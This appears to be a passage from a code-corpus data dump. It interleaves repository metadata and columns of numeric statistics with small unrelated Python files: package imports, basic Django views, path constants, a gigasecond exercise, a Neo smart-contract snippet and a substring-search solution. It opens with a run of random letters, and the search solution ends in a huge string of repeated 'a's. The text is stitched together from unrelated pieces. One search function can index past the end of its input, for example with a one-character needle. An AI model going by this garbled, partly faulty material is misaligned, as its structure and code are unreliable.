nneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyv
egurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsvs")) | 932.181818 | 10,046 | 0.992296 | 32 | 10,254 | 317.96875 | 0.625 | 0.002555 | 0.007273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000196 | 0.003511 | 10,254 | 11 | 10,046 | 932.181818 | 0.995596 | 0.002438 | 0 | 0 | 0 | 0 | 0.979248 | 0.978857 | 0 | 1 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.5 | 0.333333 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bd86b7c12e2fce81818955014537f191b53a30d8 | 43 | py | Python | data_processing/visualization/preprocessing/__init__.py | FMsunyh/keras-retinanet | cb86a987237d3f6bd504004e2b186cf65606c890 | [
"Apache-2.0"
] | 25 | 2019-04-14T05:42:28.000Z | 2022-01-04T18:57:26.000Z | core/preprocessing/__init__.py | FMsunyh/keras-yolo2 | 3439e2cffecbb47349fca8adb727c1c298d9c2d9 | [
"Apache-2.0"
] | 1 | 2020-04-30T10:52:24.000Z | 2020-04-30T10:52:24.000Z | core/preprocessing/__init__.py | FMsunyh/keras-yolo2 | 3439e2cffecbb47349fca8adb727c1c298d9c2d9 | [
"Apache-2.0"
] | 4 | 2019-07-23T10:00:46.000Z | 2021-10-12T02:52:04.000Z | from .pascal_voc import PascalVocGenerator
| 21.5 | 42 | 0.883721 | 5 | 43 | 7.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bd94f3e5a8530836d0dc0dfba8f136522b469305 | 681 | py | Python | apps/webodoobim/views/views.py | youssriaboelseod/pyerp | 9ef9873e2ff340010656f0c518bccf9d7a14dbaa | [
"MIT"
] | 1 | 2022-03-19T14:43:02.000Z | 2022-03-19T14:43:02.000Z | apps/webodoobim/views/views.py | youssriaboelseod/pyerp | 9ef9873e2ff340010656f0c518bccf9d7a14dbaa | [
"MIT"
] | null | null | null | apps/webodoobim/views/views.py | youssriaboelseod/pyerp | 9ef9873e2ff340010656f0c518bccf9d7a14dbaa | [
"MIT"
] | 1 | 2020-03-28T03:26:32.000Z | 2020-03-28T03:26:32.000Z | # Future Library
from __future__ import unicode_literals
# Django Library
from django.core.mail import EmailMessage
from django.shortcuts import HttpResponse, render
from django.template.loader import render_to_string
from django.views.generic import DetailView, ListView
BIM_PHONE = "+56 9 4299 4534"


def index(request):
    return render(request, 'webodoobim/index.html')


def about(request):
    return render(request, 'webodoobim/about.html')


def services(request):
    return render(request, 'webodoobim/services.html')


def contact(request):
    return render(request, 'webodoobim/contact_us.html')


def blog(request):
    return render(request, 'webodoobim/blog.html')
| 26.192308 | 56 | 0.778267 | 88 | 681 | 5.920455 | 0.443182 | 0.12476 | 0.182342 | 0.24952 | 0.345489 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018487 | 0.126285 | 681 | 25 | 57 | 27.24 | 0.857143 | 0.044053 | 0 | 0 | 0 | 0 | 0.195988 | 0.141975 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3125 | false | 0 | 0.3125 | 0.3125 | 0.9375 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
bdd4e81d34c6888ed11845e48d4858080617f549 | 83 | py | Python | shared/consts.py | JFF-Bohdan/item_lookup | cf98c94d7b212a81ef499e8160f855fc3e9015ce | [
"MIT"
] | 1 | 2021-02-17T21:07:19.000Z | 2021-02-17T21:07:19.000Z | shared/consts.py | JFF-Bohdan/item_lookup | cf98c94d7b212a81ef499e8160f855fc3e9015ce | [
"MIT"
] | null | null | null | shared/consts.py | JFF-Bohdan/item_lookup | cf98c94d7b212a81ef499e8160f855fc3e9015ce | [
"MIT"
] | null | null | null | DATABASE_FILE = "./db/passports.sqlite"
LMDB_DATABASE_FILE = "./db/passports.lmdb"
| 27.666667 | 42 | 0.759036 | 11 | 83 | 5.454545 | 0.545455 | 0.4 | 0.466667 | 0.766667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072289 | 83 | 2 | 43 | 41.5 | 0.779221 | 0 | 0 | 0 | 0 | 0 | 0.481928 | 0.253012 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
bde0f64adfcc1ab4d37182c94ac58ac30f546861 | 28 | py | Python | apps/import_excel/views/__init__.py | crisariasgg/RepinSolution | 27e9b04ccc887b4300d77dda8657e761f9523123 | [
"MIT"
] | null | null | null | apps/import_excel/views/__init__.py | crisariasgg/RepinSolution | 27e9b04ccc887b4300d77dda8657e761f9523123 | [
"MIT"
] | null | null | null | apps/import_excel/views/__init__.py | crisariasgg/RepinSolution | 27e9b04ccc887b4300d77dda8657e761f9523123 | [
"MIT"
] | 1 | 2021-12-09T21:27:35.000Z | 2021-12-09T21:27:35.000Z | from .import_excel import *
| 14 | 27 | 0.785714 | 4 | 28 | 5.25 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
da0cb8f822c20c57be99cc70746cc800b4abaaf2 | 146 | py | Python | python/gigasecond/gigasecond.py | troberson/exercises-exercism | 143c94c72e05661b4ec3b7e383d5afcd2a75710f | [
"Unlicense"
] | 1 | 2018-10-13T00:18:41.000Z | 2018-10-13T00:18:41.000Z | python/gigasecond/gigasecond.py | troberson/exercises-exercism | 143c94c72e05661b4ec3b7e383d5afcd2a75710f | [
"Unlicense"
] | null | null | null | python/gigasecond/gigasecond.py | troberson/exercises-exercism | 143c94c72e05661b4ec3b7e383d5afcd2a75710f | [
"Unlicense"
] | null | null | null | from datetime import datetime, timedelta


def add_gigasecond(birth_date: datetime) -> datetime:
return birth_date + timedelta(seconds=10**9)
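A gigasecond (10**9 seconds) is about 31.7 years; a quick standalone check of the arithmetic, using a moment commonly seen in the exercism test data:

```python
# Standalone check of the gigasecond arithmetic:
# 10**9 s = 11574 days + 6400 s = 11574 days, 1 h 46 min 40 s.
from datetime import datetime, timedelta

def add_gigasecond(birth_date: datetime) -> datetime:
    return birth_date + timedelta(seconds=10**9)

print(add_gigasecond(datetime(2011, 4, 25)))  # 2043-01-01 01:46:40
```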
| 24.333333 | 53 | 0.773973 | 19 | 146 | 5.789474 | 0.684211 | 0.163636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02381 | 0.136986 | 146 | 5 | 54 | 29.2 | 0.849206 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
da12b6a52d3fc9c730e1d1eeacaa6d94a6730ab0 | 199 | py | Python | policy_evaluation/__init__.py | floringogianu/categorical-dqn | eb939785e0e2eea60bbd67abeaedf4a9990fb5ce | [
"MIT"
] | 111 | 2017-07-27T13:19:21.000Z | 2022-01-15T17:52:55.000Z | policy_evaluation/__init__.py | floringogianu/categorical-dqn | eb939785e0e2eea60bbd67abeaedf4a9990fb5ce | [
"MIT"
] | 3 | 2017-12-05T07:18:23.000Z | 2018-04-30T00:03:36.000Z | policy_evaluation/__init__.py | floringogianu/categorical-dqn | eb939785e0e2eea60bbd67abeaedf4a9990fb5ce | [
"MIT"
] | 12 | 2017-07-31T13:46:25.000Z | 2021-08-23T04:03:19.000Z | from policy_evaluation.categorical import CategoricalPolicyEvaluation
from policy_evaluation.deterministic import DeterministicPolicy
from policy_evaluation.exploration_schedules import get_schedule
| 49.75 | 69 | 0.924623 | 20 | 199 | 8.95 | 0.6 | 0.167598 | 0.335196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060302 | 199 | 3 | 70 | 66.333333 | 0.957219 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
da15e7cd1af861ec25b37633e0a43836343e5ba6 | 101 | py | Python | boa3_test/test_sc/bytes_test/BytesToInt.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 25 | 2020-07-22T19:37:43.000Z | 2022-03-08T03:23:55.000Z | boa3_test/test_sc/bytes_test/BytesToInt.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 419 | 2020-04-23T17:48:14.000Z | 2022-03-31T13:17:45.000Z | boa3_test/test_sc/bytes_test/BytesToInt.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 15 | 2020-05-21T21:54:24.000Z | 2021-11-18T06:17:24.000Z | from boa3.builtin import public


@public
def bytes_to_int() -> int:
return b'\x01\x02'.to_int()
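`bytes.to_int` here is a boa3 builtin that compiles to a Neo VM conversion, so it only runs inside a smart contract. Off-chain, the same conversion can be sketched with plain Python's `int.from_bytes`; little-endian byte order is an assumption chosen to mirror Neo's convention:

```python
# Plain-Python sketch of the bytes-to-int conversion (not boa3 itself).
# Little-endian is assumed here to mirror Neo's integer encoding.
print(int.from_bytes(b'\x01\x02', byteorder='little'))  # 513 (0x0201)
print(int.from_bytes(b'\x01\x02', byteorder='big'))     # 258 (0x0102)
```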
| 14.428571 | 31 | 0.693069 | 17 | 101 | 3.941176 | 0.764706 | 0.149254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059524 | 0.168317 | 101 | 6 | 32 | 16.833333 | 0.738095 | 0 | 0 | 0 | 0 | 0 | 0.079208 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
da22b4253efd734f65a73b9f2f6a49b49797427b | 42 | py | Python | nbib/__init__.py | holub008/nbib | 1929d26b7256e747e0c679d2e94f6e0f2d160636 | [
"MIT"
] | 6 | 2020-06-08T13:24:17.000Z | 2022-03-23T17:31:52.000Z | nbib/__init__.py | holub008/nbib | 1929d26b7256e747e0c679d2e94f6e0f2d160636 | [
"MIT"
] | 5 | 2020-06-12T10:13:47.000Z | 2022-03-23T17:31:28.000Z | nbib/__init__.py | holub008/nbib | 1929d26b7256e747e0c679d2e94f6e0f2d160636 | [
"MIT"
] | 1 | 2021-12-15T15:24:51.000Z | 2021-12-15T15:24:51.000Z | from nbib._parsing import read, read_file
| 21 | 41 | 0.833333 | 7 | 42 | 4.714286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 42 | 1 | 42 | 42 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e5a2cb401ee89de05ab9e1c611d868f2e0fd9d30 | 60,847 | py | Python | easy/strstr.py | flsworld/leetcode | 1450db885e132be83d2297323900abdbcecebdb8 | [
"MIT"
] | null | null | null | easy/strstr.py | flsworld/leetcode | 1450db885e132be83d2297323900abdbcecebdb8 | [
"MIT"
] | null | null | null | easy/strstr.py | flsworld/leetcode | 1450db885e132be83d2297323900abdbcecebdb8 | [
"MIT"
] | null | null | null | def str_str_orig(haystack: str, needle: str) -> int:
    if not needle:
        return 0
    if needle not in haystack:
        return -1
    for i in range(len(haystack) - len(needle) + 1):
        if haystack[i] != needle[0]:
            continue
        # walk the remaining characters of needle; bounding j avoids the
        # IndexError the original raised for a single-character needle
        j = 1
        while j < len(needle) and needle[j] == haystack[i + j]:
            j += 1
        if j == len(needle):
            return i
    return -1


def str_str(haystack: str, needle: str) -> int:
if not needle:
return 0
length = len(needle)
for i in range(len(haystack) - length + 1):
if haystack[i:i + length] == needle:
return i
return -1
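The slicing version is still O(n·m) in the worst case, but the slice comparison runs in C, which is why it tends to beat the character-by-character loop in practice. A standalone sketch with a few classic checks (`find_needle` is a hypothetical name used to keep the example self-contained):

```python
# Standalone checks of the slicing approach used by str_str above.
def find_needle(haystack: str, needle: str) -> int:
    if not needle:
        return 0
    length = len(needle)
    for i in range(len(haystack) - length + 1):
        # compare one candidate window against the needle in a single step
        if haystack[i:i + length] == needle:
            return i
    return -1

assert find_needle("hello", "ll") == 2
assert find_needle("aaaaa", "bba") == -1
assert find_needle("", "") == 0
# agrees with the built-in str.find on a partial-match-heavy case
assert find_needle("mississippi", "issip") == "mississippi".find("issip")
```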


if __name__ == "__main__":
# haystack, needle = "hello", "ll"
# res = str_str(haystack, needle)
#
# assert res == 2
haystack = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa